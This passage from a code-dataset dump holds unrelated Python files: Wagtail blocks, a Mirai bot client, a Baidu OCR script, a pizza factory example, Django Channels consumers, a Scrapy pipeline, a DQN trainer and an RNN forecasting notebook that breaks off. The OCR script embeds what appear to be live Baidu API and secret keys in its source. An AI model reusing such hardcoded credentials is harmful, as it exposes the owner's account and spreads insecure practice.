the user to add images and captions to the carousel.\n \"\"\"\n\n title = blocks.CharBlock(required=True, help_text='Add title')\n subtitle = blocks.CharBlock(required=True, help_text='Add subtitle') \n\n\n images = blocks.ListBlock(\n blocks.StructBlock([\n ('image', ImageChooserBlock(required=True)),\n ('caption', blocks.CharBlock(required=False, max_length=255)),\n ])\n )\n autoplay = blocks.BooleanBlock(\n required=False,\n default=True,\n help_text='Autoplay the carousel on page load.'\n )\n interval = blocks.IntegerBlock(\n required=False,\n default=3000,\n help_text='Interval between slides in milliseconds.'\n )\n\n class Meta:\n template = \"streams/carousel.html\"\n icon = \"image\"\n label = \"Carousel\"\n \n\nclass TitleAndSubtitle(blocks.StructBlock):\n \"\"\"Title and subtitle\"\"\"\n\n title = blocks.CharBlock(required=True, help_text='Add title') \n\n title_class_name = blocks.ChoiceBlock(choices=[\n ('fw-light', 'FW-LIGHT'),\n ('text-white', 
'TEXT-WHITE'),\n    ]) \n\n    subtitle = blocks.CharBlock(required=True, help_text='Add subtitle') \n\n    subtitle_class_name = blocks.ChoiceBlock(choices=[\n        ('lead text-muted', 'LEAD TEXT-MUTED'),\n        ('text-muted', 'TEXT-MUTED'),\n    ])\n\n    heading_level = blocks.ChoiceBlock(choices=[\n        ('h1', 'H1'),\n        ('h2', 'H2'),\n        ('h3', 'H3'),\n        ('h4', 'H4'),\n        ('h5', 'H5'),\n        ('h6', 'H6'),\n    ], default='h1') \n\n    class Meta:\n        template = \"streams/title_subtitle.html\"\n        icon = \"edit\"\n        label = \"Title & subtitle\" \n\nclass RichtextBlock(blocks.RichTextBlock):\n    \"\"\"Richtext with all the features\"\"\"\n\n    class Meta:\n        template = \"streams/richtext_block.html\"\n        icon = \"edit\"\n        label = \"Full RichText\"\n\nclass CardBlock(blocks.StructBlock):\n    \"\"\" Image and description\"\"\" \n    \n    cards = blocks.ListBlock(\n        blocks.StructBlock(\n            [\n                (\"image\", ImageChooserBlock(required=True)),\n                (\"title\", blocks.CharBlock(required=True, max_length=40)),\n                (\"text\", blocks.TextBlock(required=True, max_length=200)),\n                \n            ]\n        )\n    )\n\n    class Meta:\n        template = \"streams/card_block.html\"\n        icon = \"placeholder\"\n        label = \"Images\"\n\n\nclass Footer(blocks.StructBlock):\n    ''' Footer block '''\n\n    year = blocks.IntegerBlock(required=True, default='2023')\n    company_name = blocks.CharBlock(required=True, default='Company Name')\n\n    class Meta:\n        template = \"streams/footer.html\" \n\nclass NewsSection(blocks.StructBlock):\n    \"\"\"News section with title, description and list of articles\"\"\"\n\n    title = blocks.CharBlock(required=True)\n    description = blocks.RichTextBlock(required=True, help_text='Add a short description of the news section')\n    articles = blocks.ListBlock(blocks.StructBlock([\n        ('title', blocks.CharBlock(required=True)),\n        ('date', blocks.DateBlock(required=True)),\n        ('image', ImageChooserBlock()),\n        ('summary', blocks.RichTextBlock(required=True)), \n    ]))\n\n    class Meta:\n        template = 'streams/news_section.html'\n        icon = 'folder-open'\n        label = 'News Section'\n","repo_name":"PaulStaniewski/wagtail-website","sub_path":"streams/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24829700038","text":"import json\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport atexit\n\nimport requests as req\nfrom rich.console import Console\n\nfrom easyMirai.sendType import sendTypeMode\nfrom easyMirai.getType import getTypeMode\nfrom easyMirai.setType import setTypeMode\nfrom easyMirai.uploadType import uploadTypeMode\nfrom easyMirai.actionType import actionTypeMode\nfrom easyMirai.eventType import eventTypeMode\n\nfrom easyMirai.__version__ import __version__\n\n_config = {\n    \"about\": \"/about\",\n    \"verify\": \"/verify\",\n    \"bind\": \"/bind\",\n    \"release\": \"/release\",\n    \"data\": {\n        \"url\": \"\",\n        \"session\": \"\",\n        \"botId\": \"\"\n    }\n}\n\n\nclass Init:\n    def __init__(self, host: str, port: str, botId: str, key: str, maxWork: int = 8, isSlice: bool = False):\n        self._host: str = host\n        self._port: str = port\n        self._botId: str = botId\n        self._key: str = key\n        self._session: str = \"\"\n        self._c = Console()\n        self._url = self._host + \":\" + self._port  # build the Bot HTTP API base address\n        self.__version__ = __version__\n        self._c.log(\"[Notice]: current easyMirai version is \" + self.__version__, style=\"#a4ff8f\")\n        self._c.log(\"[Notice]: docs & tutorial: https://github.com/easyMirais/easyMirai/wiki\", style=\"#a4ff8f\")\n        self._testServer()\n        self._pool = self._createPool(maxWork)  # 
create the worker thread pool\n        self._beginSession()\n        self._isSlice = isSlice\n\n        _config[\"data\"][\"url\"] = self._url\n        _config[\"data\"][\"botId\"] = self._botId\n        _config[\"data\"][\"session\"] = self._session\n\n    def _testServer(self):\n        # check that the Mirai HTTP server is actually running\n        try:\n            request = req.get(url=self._url + _config[\"about\"], timeout=5)\n        except Exception as re:\n            request = re\n            self._c.log(\"[Alert]: bad address or port, detail: no Mirai HTTP server found\", style=\"#fb48a0\")\n            exit(404)\n        if request.status_code == 200:\n            data = json.loads(request.text)\n            if data[\"code\"] == 0:\n                version = data[\"data\"][\"version\"]\n                self._c.log(\"[Notice]: current Mirai-HTTP-API version is \" + version + \" , detail: Mirai HTTP server found\", style=\"#a4ff8f\")\n\n    def _createPool(self, maxWork: int):\n        pool = ThreadPoolExecutor(maxWork)\n        self._c.log(\"[Notice]: created a thread pool with capacity \" + str(maxWork), style=\"#a4ff8f\")\n        return pool\n\n    def _beginSession(self):\n        data = {\n            \"verifyKey\": self._key\n        }\n        data = req.post(url=self._url + _config[\"verify\"], data=json.dumps(data))\n        if data.status_code == 200:\n            data = json.loads(data.text)\n            if data[\"code\"] == 0:\n                self._session = data[\"session\"]\n            else:\n                self._c.log(\"[Error]: failed to obtain session\", style=\"#ff8f8f\")\n\n        data = {\n            \"sessionKey\": self._session,\n            \"qq\": self._botId\n        }\n\n        data = req.post(url=self._url + _config[\"bind\"], data=json.dumps(data))\n        if data.status_code == 200:\n            data = json.loads(data.text)\n            if data[\"code\"] == 0:\n                self._c.log(\"[Notice]: session bound successfully\", \"detail: session=\" + self._session, style=\"#a4ff8f\")\n            else:\n                self._c.log(\"[Error]: failed to bind session: \" + data[\"msg\"], style=\"#ff8f8f\")\n\n\nclass Mirai(Init):\n\n    def __repr__(self):\n        return \"Please select an operation mode\"\n\n    # public interfaces\n    @property\n    def send(self):\n        return sendTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n    @property\n    def get(self):\n        return getTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n    @property\n    def set(self):\n        return setTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n    @property\n    def upload(self):\n        return uploadTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n    @property\n    def action(self):\n        return actionTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n    def event(self, eventId: int):\n        return eventTypeMode(session=self._session, uri=str(self._url), eventId=eventId, isSlice=self._isSlice)\n\n\n@atexit.register\ndef _stop():\n    _c = Console()\n    data = {\n        \"sessionKey\": _config[\"data\"][\"session\"],\n        \"qq\": _config[\"data\"][\"botId\"]\n    }\n    try:\n        data = req.post(url=_config[\"data\"][\"url\"] + _config[\"release\"], data=json.dumps(data))\n    except Exception as re:\n        _requests = re\n        exit(404)\n    if data.status_code == 200:\n        data = json.loads(data.text)\n        if data[\"code\"] == 0:\n            _c.log(\"[Notice]: session released successfully\", \"detail: session=\" + _config[\"data\"][\"session\"], style=\"#a4ff8f\")\n","repo_name":"easyMirais/easyMirai","sub_path":"easyMirai/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"30880615557","text":"import requests\nimport base64\n\n\ndef get_access_token(url: str, api_key: str, secret_key: str) -> str:\n    url += \"?grant_type=client_credentials&client_id={}&client_secret={}\".format(api_key, secret_key)\n    return requests.post(url).json()[\"access_token\"]\n\n\ndef ocr(access_token: str, url: str, filename: str, img_type: str) -> str:\n    with 
open(filename, mode=\"rb\") as f:\n base64_code = \"data:image/{};base64,{}\".format(img_type, base64.b64encode(f.read()).decode())\n\n url += \"?access_token={}\".format(access_token)\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n data_json = {\n \"image\": base64_code,\n # \"language_type\": \"ENG\"\n }\n\n result = requests.post(url, data=data_json, headers=headers).json()\n\n final_result = \"\"\n\n for word in result[\"words_result\"]:\n final_result += word[\"words\"].replace(\" \", \"\")\n\n return final_result\n\n\nif __name__ == \"__main__\":\n url_auth = \"https://aip.baidubce.com/oauth/2.0/token\"\n url_ocr = \"https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic\"\n\n api_key = \"OqriWbs7YCc57oWPM2RTtTuw\"\n secret_key = \"P5L5Wz1k75SMgZOGqypNVANNWt4nibm4\"\n\n access_token = get_access_token(url_auth, api_key, secret_key)\n\n final_str = \"\"\n for x in range(4):\n final_str += ocr(access_token, url_ocr, \"img/{}.png\".format(x + 1), \"png\")\n print(\"finish \" + \"{}.png\".format(x + 1))\n\n print(final_str)\n\n # with open(\"out.txt\", \"w\", encoding=\"utf-8\") as f:\n # f.write(final_str)\n","repo_name":"BillGoldenWater/Tools-py","sub_path":"BaiduOCR/BaiduOCR.py","file_name":"BaiduOCR.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2365152273","text":"from abc import ABC, abstractmethod\nimport pizza\nfrom ingredient_factory import NYPizzaIngredientFactory\nfrom pizza_enum import PizzaNames\n\n\nclass PizzaStore(ABC):\n def order_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n order = self.create_pizza(pizza_name)\n\n order.prepare()\n order.bake()\n order.cut()\n order.box()\n\n return order\n\n @abstractmethod\n def create_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n \"\"\"\n A factory method handles object creation and encapsulates it in a subclass.\n This decouples the client code in the superclass from the object creation code in the subclass.\n \"\"\"\n raise NotImplementedError\n\n\nclass NYPizzaStore(PizzaStore):\n def create_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n ingredient_factory = NYPizzaIngredientFactory()\n\n if pizza_name == PizzaNames.CHEESE:\n print(\"prepare New York style Cheese pizza\")\n return pizza.CheesePizza(ingredient_factory)\n\n if pizza_name == PizzaNames.MARGHERITA:\n print(\"prepare New York style Margherita pizza\")\n return pizza.MargheritaPizza(ingredient_factory)\n","repo_name":"AIright/python-patterns","sub_path":"factory/abstract_factory/pizza_store.py","file_name":"pizza_store.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41031274066","text":"from asgiref.sync import async_to_sync\nfrom channels.consumer import SyncConsumer\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass RunMessageConsumer(SyncConsumer):\n def websocket_connect(self, event):\n group_name = self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]\n\n self.send(\n {\n \"type\": \"websocket.accept\",\n }\n )\n\n # Join group\n print(\"Consumer joined run message group\", group_name)\n async_to_sync(self.channel_layer.group_add)(group_name, self.channel_name)\n\n def websocket_disconnect(self, event):\n\n # Leave group\n group_name = self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]\n async_to_sync(self.channel_layer.group_discard)(group_name, self.channel_name)\n\n def 
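websocket_receive(self, event):\n        # (added sketch) frames sent by the client are ignored; this consumer only\n        # relays 'new_message' events that workers post to the channel-layer group.\n        pass\n\n    def 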
new_message(self, event):\n        to_sent = {\n            \"type\": \"websocket.send\",\n            \"text\": event[\"content\"],\n        }\n        self.send(to_sent)\n\n\nclass AsyncRunStatusConsumer(AsyncWebsocketConsumer):\n    async def connect(self):\n        self.channel_group_name = \"\".join(\n            [\"status_\", self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]]\n        )\n\n        # Join the group\n        await self.channel_layer.group_add(self.channel_group_name, self.channel_name)\n        await self.accept()\n\n    async def disconnect(self, close_code):\n        # Leave the group\n        await self.channel_layer.group_discard(\n            self.channel_group_name, self.channel_name\n        )\n\n    # Receive message from WebSocket\n    async def receive(self, text_data=None, bytes_data=None):\n        pass\n\n    # Receive message from the group\n    async def new_message(self, event):\n        print(\"Msg arrived in consumer, sending to socket\")\n        text = event[\"content\"]\n        print(\"new async msg to\", self.channel_group_name)\n        # Send message to WebSocket\n        await self.send(text_data=text)\n\n\nclass AsyncRunProgressConsumer(AsyncWebsocketConsumer):\n    async def connect(self):\n        self.channel_group_name = \"\".join(\n            [\"progress_\", self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]]\n        )\n\n        print(self.channel_group_name)\n\n        # Join the group\n        await self.channel_layer.group_add(self.channel_group_name, self.channel_name)\n        await self.accept()\n\n    async def disconnect(self, close_code):\n        # Leave the group\n        await self.channel_layer.group_discard(\n            self.channel_group_name, self.channel_name\n        )\n\n    # Receive message from WebSocket\n    async def receive(self, text_data=None, bytes_data=None):\n        pass\n\n    # Receive message from the group\n    async def new_message(self, event):\n        print(\"sent progress msg\", event[\"content\"])\n        text = event[\"content\"]\n        # Send message to WebSocket\n        await self.send(text_data=text)\n","repo_name":"thomasbtf/snakesite","sub_path":"workflow/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"72130443132","text":"#! 
/usr/bin/python3\n# coding=utf-8\n\nimport pymysql\nfrom twisted.enterprise import adbapi\nimport re\nfrom datetime import datetime, timedelta\nimport pytz\n\n\ndef difTime(sqlTime):\n    # monDict = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n    monDict = {\n        'Jan': 1, 'Feb': 2, 'Mar': 3,\n        'Apr': 4, 'May': 5, 'Jun': 6,\n        'Jul': 7, 'Aug': 8, 'Sep': 9,\n        'Oct': 10, 'Nov': 11, 'Dec': 12\n    }\n    dateTup = re.match(r'.+?([0-9]{1,2})\\s([A-Z][a-z]{2})\\s([0-9]{4})\\s([0-9]{2}:[0-9]{2}:[0-9]{2}).*', sqlTime).groups()\n    dateStr = dateTup[2] + '-' + str(monDict[dateTup[1]]) + '-' + dateTup[0] + ' ' + dateTup[3]\n    dateTime = datetime.strptime(dateStr,\"%Y-%m-%d %H:%M:%S\")\n    dateTime = dateTime.replace(tzinfo=pytz.timezone('GMT'))\n    # print(dateTime)\n    nowTime = datetime.now(pytz.timezone('GMT'))\n    # print((nowTime - dateTime).seconds)\n    # print(nowTime)\n    # print(dateTime)\n    return (nowTime - dateTime).seconds\n\n\n# asynchronous insert/update pipeline\nclass NewsPipeline(object):\n    def __init__(self, dbpool):\n        self.dbpool = dbpool\n    \n\n    @classmethod\n    def from_settings(cls, settings): # fixed method name, called by scrapy; settings values are directly available\n        \"\"\"\n        Set up the database connection pool\n        :param settings: configuration parameters\n        :return: pipeline instance\n        \"\"\"\n        adbparams = dict(\n            host=settings['MYSQL_HOST'],\n            db=settings['MYSQL_DBNAME'],\n            user=settings['MYSQL_USER'],\n            password=settings['MYSQL_PASSWORD'],\n            cursorclass=pymysql.cursors.DictCursor # use a dict-style cursor\n        )\n        \n        # connect via an adbapi ConnectionPool, using pymysql (or MySQLdb)\n        dbpool = adbapi.ConnectionPool('pymysql', **adbparams)\n        # return the pipeline instance\n        return cls(dbpool)\n    \n\n    def process_item(self, item, spider):\n        \"\"\"\n        Run the MySQL insert asynchronously with twisted; the pool executes the SQL and returns a Deferred object.\n        \"\"\"\n        query = self.dbpool.runInteraction(self.do_insert, item) # specify the operation and the data\n        # attach error handling\n        query.addCallback(self.handle_error) # handle exceptions\n    \n\n    def do_insert(self, cursor, item):\n        # insert into the database; no explicit commit is needed, twisted commits automatically\n        insert_sql = \"insert into urls (url, time, judge, isdelete) values (%s, %s, 'no', 'no');\"\n        inquire_sql = \"select time from urls where url = %s;\"\n        update_sql = \"update urls set time = %s, judge = 'no' where url = %s;\"\n\n        if not re.search(r'.*?(index|video?).*', item['url'], re.I):\n            #if not re.search('index', item['url']):\n            cursor.execute(inquire_sql, item['url'])\n            n = cursor.fetchall()\n            # print(n)\n            if not n:\n                try:\n                    cursor.execute(insert_sql, (item['url'], item['time']))\n                except:\n                    pass\n            elif difTime(n[0]['time']) > 7200:\n                cursor.execute(update_sql, (item['time'], item['url']))\n    \n\n    def handle_error(self, failure):\n        if failure:\n            # print the error message\n            print(failure)\n","repo_name":"jackhanyuan/news-crawler-search-engine","sub_path":"news/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35535227539","text":"class Element:\n    count = 0\n\n    def __init__(self, value):\n        self.value = value\n        self.next = None\n        Element.count += 1\n\n\nclass Stack:\n\n    def __init__(self, head=None):\n        if head is None:\n            self.head = None\n        else:\n            self.head = Element(head)\n\n    def push(self, new_element):\n        \"\"\"Push (add) a new element onto the top of the stack\"\"\"\n        if self.head is None:\n            self.head = Element(new_element)\n        else:\n            node = Element(new_element)\n            node.next = self.head\n            self.head = node\n\n    def pop(self):\n        \"\"\"Pop (remove) the first element off the top of the stack and return it\"\"\"\n        if self.head is None:\n            return None\n        else:\n            value = self.head\n            if self.head:\n                self.head = self.head.next\n            
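# (added note) detach the popped head so the returned node no longer links into the stack\n            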
value.next = None\n            return value\n\n\n# s1 = Stack()\n# print(s1.pop().value)\n# s1.push(1)\n# print(s1.head.__dict__)\n# s1.push(2)\n# print(s1.head.__dict__)\n# print(s1.head.next.__dict__)\n# s1.push(3)\n# print(s1.head.__dict__)\n# print(s1.pop().value)\n# print(s1.head.__dict__)\n","repo_name":"MrMuraliS/data-structures-and-algorithms","sub_path":"1. List-Based Collections/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"821229459","text":"import os, envio, pyodbc\nimport pandas as pd\nfrom flask import redirect, url_for\nfrom definitions import ROOT_DIR_STATIC\n\n\nd_f = pd.read_excel(os.path.join(ROOT_DIR_STATIC, 'pandas_cliente.xlsx'),\n                    engine='openpyxl')\n\nd_f[\"rut_cliente\"] = d_f[\"rut_cliente\"].astype(\"string\")\nd_f[\"rut_cliente\"] = d_f[\"rut_cliente\"].str.upper()\n\nprint(len(d_f))\nd_f = d_f.drop_duplicates([\"rut_cliente\"], keep='first')\nd_f = d_f.sort_values(by=['rut_cliente'], ascending=True)\n\n# d_f.to_excel('clientes_no_repetidos.xlsx', index=False, header=True)\n\nd_f = d_f.drop_duplicates([\"rut_cliente\"], keep='first')\n\nd_f[\"nombre_cliente\"] = d_f[\"nombre_cliente\"].astype(\"string\")\n\nprint(d_f.dtypes)\nd_f = d_f.convert_dtypes()  # convert_dtypes() returns a new frame, so the result must be re-assigned\nprint(d_f.dtypes)\n\nprint(len(d_f))","repo_name":"azreizor/Itau_NGD","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42441907509","text":"from django.urls import path\n\nfrom account.views import ProfileView, EditProfileView, RegisterUserView, LoginUserView\n\nurlpatterns = [\n    path('profile/', ProfileView.as_view(), name='show-profile'),\n    path('edit', EditProfileView.as_view(), name='edit-profile'),\n    path('register', RegisterUserView.as_view(), name='register-account'),\n    path('login', LoginUserView.as_view(), name='login-account')\n]\n","repo_name":"jamedadi/Divar","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"30003619205","text":"# sequences of M numbers chosen from N natural numbers (non-descending, no duplicates)\nimport sys\nfrom itertools import combinations\n\nn, m = map(int, input().split())\ndata = list(map(int, input().split()))\ndata.sort()\n\nfor c in sorted(set(combinations(data, m))):\n    sys.stdout.write(' '.join(map(str, c)) + \"\\n\")\n# s = set()\n# arr = [0] * m\n#\n#\n# def func(idx, start):\n#     if idx == m:\n#         s.add(tuple(arr))\n#         return\n#     for i in range(start, n):\n#         arr[idx] = data[i]\n#         func(idx + 1, i + 1)\n#\n#\n# func(0, 0)\n# for a in sorted(s):\n#     sys.stdout.write(' '.join(map(str, a)) + \"\\n\")\n","repo_name":"jaelyangChoi/CodingTest","sub_path":"brute_force/N,M/N과M(10).py","file_name":"N과M(10).py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1054764501","text":"import copy\nimport math\nimport time\n\nimport hydra\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom omegaconf import DictConfig, OmegaConf\n\nimport salina\nimport salina.rl.functional as RLF\nfrom salina import Workspace, get_arguments, get_class, instantiate_class\nfrom salina.agents import Agents, NRemoteAgent, RemoteAgent, TemporalAgent\nfrom salina.agents.gyma import AutoResetGymAgent\nfrom salina.logger import TFLogger\nfrom 
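copy import deepcopy  # stdlib re-import (added); it only anchors the note below\n\n# Added note (sketch, not part of the original): soft_update_params below performs\n# Polyak averaging, target_param <- tau * param + (1 - tau) * target_param.\n# A hypothetical call each update step, soft_update_params(q_agent, q_target_agent, 0.005),\n# makes the target network track the online network slowly.\nfrom 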
salina.rl.replay_buffer import ReplayBuffer\n\n\ndef soft_update_params(net, target_net, tau):\n for param, target_param in zip(net.parameters(), target_net.parameters()):\n target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data)\n\n\ndef _state_dict(agent, device):\n sd = agent.state_dict()\n for k, v in sd.items():\n sd[k] = v.to(device)\n return sd\n\n\ndef run_dqn(q_agent, logger, cfg):\n q_agent.set_name(\"q_agent\")\n env_agent = AutoResetGymAgent(\n get_class(cfg.algorithm.env),\n get_arguments(cfg.algorithm.env),\n n_envs=int(cfg.algorithm.n_envs / cfg.algorithm.n_processes),\n )\n\n q_target_agent = copy.deepcopy(q_agent)\n\n acq_agent = TemporalAgent(Agents(env_agent, copy.deepcopy(q_agent)))\n acq_remote_agent, acq_workspace = NRemoteAgent.create(\n acq_agent,\n num_processes=cfg.algorithm.n_processes,\n t=0,\n n_steps=cfg.algorithm.n_timesteps,\n epsilon=1.0,\n )\n acq_remote_agent.seed(cfg.algorithm.env_seed)\n\n # == Setting up the training agents\n train_temporal_q_agent = TemporalAgent(q_agent)\n train_temporal_q_target_agent = TemporalAgent(q_target_agent)\n train_temporal_q_agent.to(cfg.algorithm.loss_device)\n train_temporal_q_target_agent.to(cfg.algorithm.loss_device)\n\n replay_buffer = ReplayBuffer(cfg.algorithm.buffer_size)\n acq_remote_agent(acq_workspace, t=0, n_steps=cfg.algorithm.n_timesteps, epsilon=1.0)\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n logger.message(\"[DDQN] Initializing replay buffer\")\n while replay_buffer.size() < cfg.algorithm.initial_buffer_size:\n acq_workspace.copy_n_last_steps(cfg.algorithm.overlapping_timesteps)\n acq_remote_agent(\n acq_workspace,\n t=cfg.algorithm.overlapping_timesteps,\n n_steps=cfg.algorithm.n_timesteps - cfg.algorithm.overlapping_timesteps,\n epsilon=1.0,\n )\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n\n logger.message(\"[DDQN] Learning\")\n epsilon_by_epoch = lambda epoch: cfg.algorithm.epsilon_final + (\n cfg.algorithm.epsilon_start - cfg.algorithm.epsilon_final\n ) * math.exp(-1.0 * epoch / cfg.algorithm.epsilon_exploration_decay)\n\n optimizer_args = get_arguments(cfg.algorithm.optimizer)\n optimizer = get_class(cfg.algorithm.optimizer)(\n q_agent.parameters(), **optimizer_args\n )\n iteration = 0\n for epoch in range(cfg.algorithm.max_epoch):\n epsilon = epsilon_by_epoch(epoch)\n logger.add_scalar(\"monitor/epsilon\", epsilon, iteration)\n\n for a in acq_remote_agent.get_by_name(\"q_agent\"):\n a.load_state_dict(_state_dict(q_agent, \"cpu\"))\n\n acq_workspace.copy_n_last_steps(cfg.algorithm.overlapping_timesteps)\n acq_remote_agent(\n acq_workspace,\n t=cfg.algorithm.overlapping_timesteps,\n n_steps=cfg.algorithm.n_timesteps - cfg.algorithm.overlapping_timesteps,\n epsilon=epsilon,\n )\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n\n done, creward = acq_workspace[\"env/done\", \"env/cumulated_reward\"]\n creward = creward[done]\n if creward.size()[0] > 0:\n logger.add_scalar(\"monitor/reward\", creward.mean().item(), epoch)\n\n logger.add_scalar(\"monitor/replay_buffer_size\", replay_buffer.size(), epoch)\n\n # Inner loop to minimize the TD\n for inner_epoch in range(cfg.algorithm.inner_epochs):\n batch_size = cfg.algorithm.batch_size\n replay_workspace = replay_buffer.get(batch_size).to(\n cfg.algorithm.loss_device\n )\n # Batch size + Time_size\n action = replay_workspace[\"action\"]\n train_temporal_q_agent(\n replay_workspace,\n t=0,\n n_steps=cfg.algorithm.buffer_time_size,\n 
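# replay=True (added note): evaluate Q on stored transitions, without stepping the env\n                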
replay=True,\n                epsilon=0.0,\n            )\n            q, done, reward = replay_workspace[\"q\", \"env/done\", \"env/reward\"]\n\n            with torch.no_grad():\n                train_temporal_q_target_agent(\n                    replay_workspace,\n                    t=0,\n                    n_steps=cfg.algorithm.buffer_time_size,\n                    replay=True,\n                    epsilon=0.0,\n                )\n                q_target = replay_workspace[\"q\"]\n\n            td = RLF.doubleqlearning_temporal_difference(\n                q,\n                action,\n                q_target,\n                reward,\n                done,\n                cfg.algorithm.discount_factor,\n            )\n            error = td ** 2\n\n            # Add burning steps for the first timesteps in the trajectories (for recurrent policies)\n            burning = torch.zeros_like(td)\n            burning[cfg.algorithm.burning_timesteps :] = 1.0\n            error = error * burning\n            loss = error.mean()\n            logger.add_scalar(\"loss/q_loss\", loss.item(), iteration)\n\n            optimizer.zero_grad()\n            loss.backward()\n\n            if cfg.algorithm.clip_grad > 0:\n                n = torch.nn.utils.clip_grad_norm_(\n                    q_agent.parameters(), cfg.algorithm.clip_grad\n                )\n                logger.add_scalar(\"monitor/grad_norm\", n.item(), iteration)\n            optimizer.step()\n            iteration += 1\n\n        # Update of the target network\n        if cfg.algorithm.hard_target_update:\n            if epoch % cfg.algorithm.update_target_epochs == 0:\n                q_target_agent.load_state_dict(q_agent.state_dict())\n        else:\n            tau = cfg.algorithm.update_target_tau\n            soft_update_params(q_agent, q_target_agent, tau)\n\n\n@hydra.main(config_path=\".\", config_name=\"gym.yaml\")\ndef main(cfg):\n    import torch.multiprocessing as mp\n\n    mp.set_start_method(\"spawn\")\n    logger = instantiate_class(cfg.logger)\n    logger.save_hps(cfg)\n\n    q_agent = instantiate_class(cfg.q_agent)\n    run_dqn(q_agent, logger, cfg)\n\n\nif __name__ == \"__main__\":\n    OmegaConf.register_new_resolver(\"plus\", lambda x, y: x + y)\n    OmegaConf.register_new_resolver(\"n_gpus\", lambda x: 0 if x == \"cpu\" else 1)\n    main()\n","repo_name":"facebookresearch/salina","sub_path":"salina_examples/rl/dqn/double_dqn/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":6671,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"78"} +{"seq_id":"15013405768","text":"# Code to predict hourly energy consumption (time-series data) with the RNN model built on day 6\n\n# https://towardsdatascience.com/building-rnn-lstm-and-gru-for-time-series-using-pytorch-a46e5b094e7b \n# data : https://www.kaggle.com/datasets/robikscube/hourly-energy-consumption\n# fitting the RNN model constructed in day6 (work out the tensor dimensions line by line while implementing the model, and add comments)\n\n#%%\n#EDA\nimport plotly.graph_objs as go # go declares a Figure object and configures the Data, Layout, etc. that the Figure needs\nfrom plotly.offline import iplot\n\ndef plot_dataset(df, title):\n    data = []\n    value = go.Scatter(\n        x=df.index,\n        y=df.value,\n        mode=\"lines\",\n        name=\"values\",\n        marker=dict(),\n        text=df.index,\n        line=dict(color=\"rgba(0,0,0, 0.3)\"),\n    )\n    data.append(value)\n\n    layout = dict(\n        title=title,\n        xaxis=dict(title=\"Date\", ticklen=5, zeroline=False),\n        yaxis=dict(title=\"Value\", ticklen=5, zeroline=False),\n    )\n\n    fig = dict(data=data, layout=layout)\n    iplot(fig)\n\n#%%\nimport pandas as pd\n\ndf = pd.read_csv('AEP_hourly.csv')\nprint(df)\n\ndf = df.set_index(['Datetime'])\ndf.index = pd.to_datetime(df.index)\nif not df.index.is_monotonic:\n    df = df.sort_index()\n    \ndf = df.rename(columns={'AEP_MW': 'value'})\ndf.shape\nplot_dataset(df, title='PJM East (AEP_MW) Region: estimated energy consumption in Megawatts (MW)')\n\n#%%\n# create time lags for predicting X(t+n)\ndef generate_time_lags(df, n_lags):\n    df_n = df.copy()\n    for n in range(1, n_lags + 1):\n        df_n[f\"lag{n}\"] = df_n[\"value\"].shift(n)\n        # shift(n): moves rows by a fixed number of positions\n        # 1. when you want to shift DataFrame rows 
